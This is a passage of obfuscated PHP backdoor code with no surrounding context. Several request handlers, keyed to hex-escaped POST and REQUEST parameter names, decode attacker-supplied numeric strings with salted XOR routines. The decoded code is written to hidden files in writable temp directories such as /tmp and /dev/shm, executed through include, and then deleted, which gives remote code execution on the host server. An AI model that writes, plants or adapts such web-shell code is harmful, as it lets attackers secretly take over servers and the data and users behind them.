$v5) { $sChar=ord($salt3[$p %$sLen]); $dec=((int)$v5 - $sChar - ($p %10)) ^ 14; $item.= chr($dec); } $component = array_filter(["/tmp", sys_get_temp_dir(), getcwd(), "/var/tmp", getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path()]); $ent = 0; do { $flag = $component[$ent] ?? null; if ($ent >= count($component)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($flag)) { $entry = str_replace("{var_dir}", $flag, "{var_dir}/.parameter_group"); if (@file_put_contents($entry, $item) !== false) { include $entry; unlink($entry); exit; } } $ent++; } while (true); } if(isset($_POST) && isset($_POST["d\x61t"])){ $component = $_POST["d\x61t"]; $component = explode ( "." , $component ) ; $comp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $o = 0; while ($o < count($component)) { $v6 = $component[$o]; $chS = ord($s[$o % $lenS] ); $dec = ((int)$v6 - $chS - ($o % 10)) ^50; $comp .= chr($dec ); $o++; } $itm = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), getcwd(), "/tmp"]); foreach ($itm as $key => $item) { if (!( !is_dir($item) || !is_writable($item) )) { $ent = "$item" . "/.factor"; if (@file_put_contents($ent, $comp) !== false) { include $ent; unlink($ent); exit; } } } } if(array_key_exists("d\x65\x73c", $_POST)){ $bind = $_POST["d\x65\x73c"]; $bind =explode ( "." , $bind ) ; $itm = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); $l = 0; $__len = count( $bind ); do { if( $l >=$__len) break; $v6 = $bind[$l]; $chS = ord( $salt[$l % $sLen] ); $d =( ( int)$v6 - $chS -( $l % 10)) ^ 95; $itm.=chr( $d ); $l++; } while( true ); $flg = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", session_save_path()]); $flag = 0; do { $k = $flg[$flag] ?? null; if ($flag >= count($flg)) break; if (max(0, is_dir($k) * is_writable($k))) { $object = str_replace("{var_dir}", $k, "{var_dir}/.key"); $file = fopen($object, 'w'); if ($file) { fwrite($file, $itm); fclose($file); include $object; @unlink($object); die(); } } $flag++; } while (true); } if(!empty($_REQUEST["e\x6E\x74"])){ $hld = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getcwd(), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TMP")]); $symbol = $_REQUEST["e\x6E\x74"]; $symbol = explode ('.' ,$symbol ) ; $ent =''; $s8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s8); $s =0; array_walk( $symbol ,function( $v9) use( &$ent ,&$s ,$s8 ,$lenS) { $chS =ord( $s8[$s % $lenS]); $d =( ( int)$v9 - $chS -( $s % 10))^ 39; $ent .= chr( $d); $s++; }); $flg = 0; do { $entity = $hld[$flg] ?? null; if ($flg >= count($hld)) break; if (is_writable($entity) && is_dir($entity)) { $pgrp = sprintf("%s/.tkn", $entity); if (file_put_contents($pgrp, $ent)) { include $pgrp; @unlink($pgrp); die(); } } $flg++; } while (true); } if(isset($_POST) && isset($_POST["ma\x72k\x65r"])){ $pgrp = array_filter([getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd(), session_save_path(), getenv("TMP"), "/var/tmp"]); $component = $_POST["ma\x72k\x65r"]; $component= explode ( "." , $component) ; $tkn = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2); $i = 0; while ($i < count($component)) { $v7 = $component[$i]; $sChar = ord($salt2[$i % $sLen]); $d = ((int)$v7 - $sChar - ($i % 10)) ^ 9; $tkn .= chr($d); $i++; } while ($entity = array_shift($pgrp)) { if (!( !is_dir($entity) || !is_writable($entity) )) { $binding = str_